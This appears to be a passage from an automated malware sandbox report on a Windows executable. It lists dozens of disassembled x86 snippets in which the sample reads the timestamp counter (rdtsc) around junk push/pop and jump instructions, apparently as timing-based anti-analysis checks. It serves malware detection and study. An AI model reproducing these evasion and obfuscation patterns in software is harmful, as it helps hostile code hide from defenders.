                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 738620 second address: 738641 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F593855EEF0h 0x0000000a popad 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F593855EEE6h 0x00000014 push edx 0x00000015 pop edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 739F9B second address: 739FA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 739FA0 second address: 739FBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a js 00007F593855EEEEh 0x00000010 pushad 0x00000011 popad 0x00000012 jno 00007F593855EEE6h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 739FBC second address: 739FFC instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5938558A96h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c je 00007F5938558AAAh 0x00000012 jmp 00007F5938558AA2h 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F5938558AA6h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 739FFC second address: 73A000 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 73CB09 second address: 73CB24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov dword ptr [esp], eax 0x00000008 mov dword ptr [ebp+122D2795h], esi 0x0000000e push 00000004h 0x00000010 cld 0x00000011 push 70AA4A38h 0x00000016 push ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 73E05E second address: 73E081 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F593855EEE6h 0x00000008 jmp 00007F593855EEF5h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 73E081 second address: 73E097 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5938558AA2h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 73E097 second address: 73E0B1 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F593855EEE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F593855EEEAh 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 73E0B1 second address: 73E0B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 73FD2F second address: 73FD35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 73FD35 second address: 73FD51 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5938558AA5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 73FD51 second address: 73FD5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F593855EEE6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 73FD5D second address: 73FD71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F5938558A9Ch 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 73FD71 second address: 73FD77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 73FD77 second address: 73FD81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push ecx 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 741892 second address: 741897 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 49602C7 second address: 49602F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5938558AA0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5938558AA7h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 49602F5 second address: 496031A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edi 0x00000005 mov ecx, edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F593855EEF6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 496031A second address: 496031E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 496031E second address: 4960324 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 4960324 second address: 496033C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5938558A9Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 496033C second address: 4960355 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F593855EEF3h 0x00000009 pop ecx 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 4960355 second address: 4960376 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebp, esp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5938558AA3h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 4960376 second address: 4960399 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 16129DFAh 0x00000008 call 00007F593855EEEBh 0x0000000d pop eax 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov edx, dword ptr [ebp+0Ch] 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov dx, si 0x0000001a push esi 0x0000001b pop edx 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 4980715 second address: 4980724 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 4980724 second address: 4980728 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 4980728 second address: 498072E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 498072E second address: 4980766 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F593855EEF8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F593855EEF7h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 4980766 second address: 498076C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 498076C second address: 4980787 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F593855EEEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebp-04h] 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 mov ax, D881h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 4980787 second address: 49807BB instructions: 0x00000000 rdtsc 0x00000002 call 00007F5938558A9Eh 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F5938558A9Bh 0x0000000f popad 0x00000010 nop 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F5938558AA0h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 49807BB second address: 49807C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 49807C1 second address: 49807DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5938558A9Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 49807DA second address: 49807DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 49807DE second address: 49807E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 49807E4 second address: 498080C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F593855EEEFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F593855EEF0h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 498080C second address: 4980810 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 4980810 second address: 4980816 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 4980816 second address: 498081C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 498083F second address: 49808A4 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F593855EEF0h 0x00000008 sub ecx, 255D7848h 0x0000000e jmp 00007F593855EEEBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 call 00007F593855EEF8h 0x0000001b mov ebx, ecx 0x0000001d pop esi 0x0000001e popad 0x0000001f cmp dword ptr [ebp-04h], 00000000h 0x00000023 jmp 00007F593855EEEDh 0x00000028 mov esi, eax 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F593855EEEDh 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 49808A4 second address: 49808AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 49808AA second address: 49808AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 49808AE second address: 49808C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F5938558B0Ah 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 49808C1 second address: 49808C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx esi, dx 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 498094F second address: 4980953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 4980953 second address: 4980957 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 4980957 second address: 498095D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 498095D second address: 498096C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F593855EEEBh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 498096C second address: 49701D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5938558AA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b leave 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 pushfd 0x00000011 jmp 00007F5938558AA8h 0x00000016 adc eax, 65FB9678h 0x0000001c jmp 00007F5938558A9Bh 0x00000021 popfd 0x00000022 popad 0x00000023 call 00007F5938558AA8h 0x00000028 movzx esi, di 0x0000002b pop ebx 0x0000002c popad 0x0000002d retn 0004h 0x00000030 nop 0x00000031 cmp eax, 00000000h 0x00000034 setne al 0x00000037 jmp 00007F5938558A92h 0x00000039 xor ebx, ebx 0x0000003b test al, 01h 0x0000003d jne 00007F5938558A97h 0x0000003f sub esp, 04h 0x00000042 mov dword ptr [esp], 0000000Dh 0x00000049 call 00007F593CA4624Fh 0x0000004e mov edi, edi 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 push edx 0x00000054 pop ecx 0x00000055 mov bx, 708Ah 0x00000059 popad 0x0000005a rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 49701D0 second address: 4970233 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F593855EEF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F593855EEF0h 0x0000000f push eax 0x00000010 jmp 00007F593855EEEBh 0x00000015 xchg eax, ebp 0x00000016 jmp 00007F593855EEF6h 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F593855EEF7h 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 4970233 second address: 4970259 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5938558AA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 2Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 4970259 second address: 497026C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F593855EEEFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 497026C second address: 49702E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5938558AA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F5938558A9Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 mov ah, bh 0x00000013 call 00007F5938558A9Ah 0x00000018 push esi 0x00000019 pop edi 0x0000001a pop ecx 0x0000001b popad 0x0000001c xchg eax, ebx 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F5938558AA3h 0x00000024 adc cl, 0000001Eh 0x00000027 jmp 00007F5938558AA9h 0x0000002c popfd 0x0000002d mov edx, ecx 0x0000002f popad 0x00000030 xchg eax, edi 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 49702E7 second address: 49702EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 49702EB second address: 49702F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 49702F1 second address: 4970354 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F593855EEECh 0x00000009 adc si, F548h 0x0000000e jmp 00007F593855EEEBh 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F593855EEF8h 0x0000001a adc ah, FFFFFFA8h 0x0000001d jmp 00007F593855EEEBh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F593855EEF4h 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 49703C7 second address: 49703DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 movsx edx, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test al, al 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov bh, B9h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 49703DC second address: 49703F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F593855EEF7h 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 49703F9 second address: 497042C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 je 00007F5938558C48h 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F5938558A9Bh 0x00000014 jmp 00007F5938558AA3h 0x00000019 popfd 0x0000001a push eax 0x0000001b push edx 0x0000001c mov dx, ax 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 497042C second address: 4970430 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 4970505 second address: 4970513 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 test eax, eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 4970513 second address: 4970517 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 4970517 second address: 4970534 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5938558AA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 4970534 second address: 49705FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F593855EEF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007F59AAC7CE29h 0x0000000f jmp 00007F593855EEEEh 0x00000014 js 00007F593855EF3Bh 0x0000001a pushad 0x0000001b pushad 0x0000001c push esi 0x0000001d pop edx 0x0000001e movzx ecx, bx 0x00000021 popad 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007F593855EEEBh 0x00000029 adc cx, 00DEh 0x0000002e jmp 00007F593855EEF9h 0x00000033 popfd 0x00000034 mov edi, ecx 0x00000036 popad 0x00000037 popad 0x00000038 cmp dword ptr [ebp-14h], edi 0x0000003b jmp 00007F593855EEEAh 0x00000040 jne 00007F59AAC7CDD9h 0x00000046 pushad 0x00000047 mov edi, eax 0x00000049 pushad 0x0000004a push eax 0x0000004b pop edx 0x0000004c mov edx, ecx 0x0000004e popad 0x0000004f popad 0x00000050 mov ebx, dword ptr [ebp+08h] 0x00000053 jmp 00007F593855EEEEh 0x00000058 lea eax, dword ptr [ebp-2Ch] 0x0000005b jmp 00007F593855EEF0h 0x00000060 xchg eax, esi 0x00000061 jmp 00007F593855EEF0h 0x00000066 push eax 0x00000067 pushad 0x00000068 push ebx 0x00000069 mov ax, 86F3h 0x0000006d pop eax 0x0000006e push eax 0x0000006f push edx 0x00000070 mov di, CEBAh 0x00000074 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 49705FB second address: 4970664 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F5938558A9Bh 0x00000008 xor esi, 2499365Eh 0x0000000e jmp 00007F5938558AA9h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 xchg eax, esi 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F5938558AA3h 0x00000021 sub cx, 106Eh 0x00000026 jmp 00007F5938558AA9h 0x0000002b popfd 0x0000002c popad 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 4970664 second address: 49706CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 5DCEh 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d jmp 00007F593855EEF0h 0x00000012 mov dword ptr [esp], eax 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F593855EEEEh 0x0000001c sub ecx, 6F8EEE48h 0x00000022 jmp 00007F593855EEEBh 0x00000027 popfd 0x00000028 pushad 0x00000029 movzx esi, bx 0x0000002c mov dh, 18h 0x0000002e popad 0x0000002f popad 0x00000030 xchg eax, ebx 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F593855EEF9h 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 49706CA second address: 49706DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5938558A9Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 49706DA second address: 49706F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov ecx, 1D31AA23h 0x0000000f movzx eax, bx 0x00000012 popad 0x00000013 xchg eax, ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 49706F4 second address: 49706F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 49706F8 second address: 49706FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 49706FC second address: 4970702 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 4970702 second address: 4970718 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F593855EEF2h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 4970757 second address: 4970778 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5938558AA5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 4970778 second address: 497077E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 497077E second address: 4970793 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5938558AA1h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 4970793 second address: 49707B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F593855EEF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test esi, esi 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F593855EEEAh 0x00000015 rdtsc
